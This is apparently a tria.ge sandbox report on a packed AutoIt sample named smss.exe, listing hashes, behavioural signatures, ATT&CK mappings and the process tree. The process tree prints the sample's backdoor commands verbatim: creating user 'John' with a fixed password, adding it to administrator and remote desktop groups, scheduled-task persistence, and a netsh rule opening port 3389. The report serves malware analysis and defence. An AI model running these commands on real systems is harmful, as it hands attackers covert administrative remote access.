Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26/08/2024, 17:39
Behavioral task
behavioral1
Sample
smss.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
smss.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
smss.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
smss.exe
Resource
win11-20240802-en
General
-
Target
smss.exe
-
Size
9.4MB
-
MD5
6fde344165a369c3586a68317279247c
-
SHA1
e39b5038f44757a7049c4ebabbd6f62deb280796
-
SHA256
90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4
-
SHA512
880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a
-
SSDEEP
196608:uQmw1JCIvqD9gd1lqFxsPE41SfWj+gzjt5s9di7aH6CcvG:uQr9qFxOE41+Wj5zjLs9U7aaRvG
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe -
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 4432 cmd.exe 816 net1.exe 1084 net.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4848 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWinst.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smss.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation smss.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation winserv.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation winserv.exe -
Executes dropped EXE 6 IoCs
pid Process 2324 winserv.exe 544 winserv.exe 4804 winserv.exe 1664 RDPWinst.exe 1668 winserv.exe 2788 winserv.exe -
Loads dropped DLL 1 IoCs
pid Process 2492 svchost.exe -
resource yara_rule behavioral3/memory/4284-0-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-2-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-3-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-4-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-5-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-6-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-7-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-8-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-9-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-31-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-34-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-55-0x00007FF713500000-0x00007FF714533000-memory.dmp themida behavioral3/memory/4284-64-0x00007FF713500000-0x00007FF714533000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 31 ip-api.com -
Modifies WinLogon 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWinst.exe -
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/memory/4284-3-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-4-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-5-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-6-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-7-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-8-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-9-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-31-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-34-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-55-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe behavioral3/memory/4284-64-0x00007FF713500000-0x00007FF714533000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\rfxvmt.dll RDPWinst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4284 smss.exe -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper smss.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini smss.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWinst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWinst.exe File opened for modification \??\c:\program files\rdp wrapper\rdpwrap.txt svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 872 timeout.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\MIME\Database smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4276 schtasks.exe 384 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 544 winserv.exe 544 winserv.exe 544 winserv.exe 544 winserv.exe 4804 winserv.exe 4804 winserv.exe 4804 winserv.exe 4804 winserv.exe 2492 svchost.exe 2492 svchost.exe 2492 svchost.exe 2492 svchost.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe 4284 smss.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2324 winserv.exe Token: SeTakeOwnershipPrivilege 544 winserv.exe Token: SeTcbPrivilege 544 winserv.exe Token: SeTcbPrivilege 544 winserv.exe Token: SeDebugPrivilege 1664 RDPWinst.exe Token: SeAuditPrivilege 2492 svchost.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 2324 winserv.exe 544 winserv.exe 544 winserv.exe 544 winserv.exe 544 winserv.exe 4804 winserv.exe 4804 winserv.exe 4804 winserv.exe 4804 winserv.exe 1668 winserv.exe 1668 winserv.exe 1668 winserv.exe 1668 winserv.exe 2788 winserv.exe 2788 winserv.exe 2788 winserv.exe 2788 winserv.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4284 wrote to memory of 4276 4284 smss.exe 87 PID 4284 wrote to memory of 4276 4284 smss.exe 87 PID 4284 wrote to memory of 384 4284 smss.exe 89 PID 4284 wrote to memory of 384 4284 smss.exe 89 PID 4284 wrote to memory of 2324 4284 smss.exe 93 PID 4284 wrote to memory of 2324 4284 smss.exe 93 PID 4284 wrote to memory of 2324 4284 smss.exe 93 PID 4284 wrote to memory of 2596 4284 smss.exe 98 PID 4284 wrote to memory of 2596 4284 smss.exe 98 PID 2596 wrote to memory of 5004 2596 cmd.exe 100 PID 2596 wrote to memory of 5004 2596 cmd.exe 100 PID 5004 wrote to memory of 3832 5004 net.exe 101 PID 5004 wrote to memory of 3832 5004 net.exe 101 PID 4284 wrote to memory of 2444 4284 smss.exe 102 PID 4284 wrote to memory of 2444 4284 smss.exe 102 PID 2444 wrote to memory of 2624 2444 cmd.exe 104 PID 2444 wrote to memory of 2624 2444 cmd.exe 104 PID 2624 wrote to memory of 984 2624 net.exe 105 PID 2624 wrote to memory of 984 2624 net.exe 105 PID 4284 wrote to memory of 5056 4284 smss.exe 106 PID 4284 wrote to memory of 5056 4284 smss.exe 106 PID 5056 wrote to memory of 1556 5056 cmd.exe 108 PID 5056 wrote to memory of 1556 5056 cmd.exe 108 PID 1556 wrote to memory of 1756 1556 net.exe 109 PID 1556 wrote to memory of 1756 1556 net.exe 109 PID 4284 wrote to memory of 3680 4284 smss.exe 110 PID 4284 wrote to memory of 3680 4284 smss.exe 110 PID 3680 wrote to memory of 972 3680 cmd.exe 140 PID 3680 wrote to memory of 972 3680 cmd.exe 140 PID 972 wrote to memory of 5116 972 net.exe 113 PID 972 wrote to memory of 5116 972 net.exe 113 PID 4284 wrote to memory of 4460 4284 smss.exe 114 PID 4284 wrote to memory of 4460 4284 smss.exe 114 PID 4460 wrote to memory of 3436 4460 cmd.exe 116 PID 4460 wrote to memory of 3436 4460 cmd.exe 116 PID 3436 wrote to memory of 4544 3436 net.exe 117 PID 3436 wrote to memory of 4544 3436 net.exe 117 PID 4284 wrote to memory of 1480 4284 smss.exe 118 PID 4284 wrote to memory of 1480 4284 smss.exe 118 PID 1480 wrote to memory of 3200 1480 cmd.exe 120 PID 1480 wrote to memory of 3200 1480 cmd.exe 120 PID 3200 wrote to memory of 3080 3200 net.exe 121 PID 3200 wrote to memory of 3080 3200 net.exe 121 PID 4284 wrote to memory of 4432 4284 smss.exe 122 PID 4284 wrote to memory of 4432 4284 smss.exe 122 PID 4432 wrote to memory of 1084 4432 cmd.exe 124 PID 4432 wrote to memory of 1084 4432 cmd.exe 124 PID 1084 wrote to memory of 816 1084 net.exe 125 PID 1084 wrote to memory of 816 1084 net.exe 125 PID 4284 wrote to memory of 1664 4284 smss.exe 130 PID 4284 wrote to memory of 1664 4284 smss.exe 130 PID 4284 wrote to memory of 1664 4284 smss.exe 130 PID 1664 wrote to memory of 4848 1664 RDPWinst.exe 134 PID 1664 wrote to memory of 4848 1664 RDPWinst.exe 134 PID 4284 wrote to memory of 3856 4284 smss.exe 135 PID 4284 wrote to memory of 3856 4284 smss.exe 135 PID 3856 wrote to memory of 872 3856 cmd.exe 137 PID 3856 wrote to memory of 872 3856 cmd.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\smss.exe"C:\Users\Admin\AppData\Local\Temp\smss.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:384
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2324 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\net.exenet user John 12345 /add3⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add4⤵PID:3832
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add4⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add4⤵PID:1756
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add4⤵PID:5116
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\net.exenet localgroup "Administrators" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add4⤵PID:4544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\net.exenet localgroup "Administradores" John /add3⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add4⤵PID:3080
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:816
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:872
-
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:972
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1668
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2788
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
2KB
MD5bc909d39981af556d07dc67178f61472
SHA1a4e5b1c5bc746435a5baf11b728e83fb8e654da0
SHA25610cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8
SHA512acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32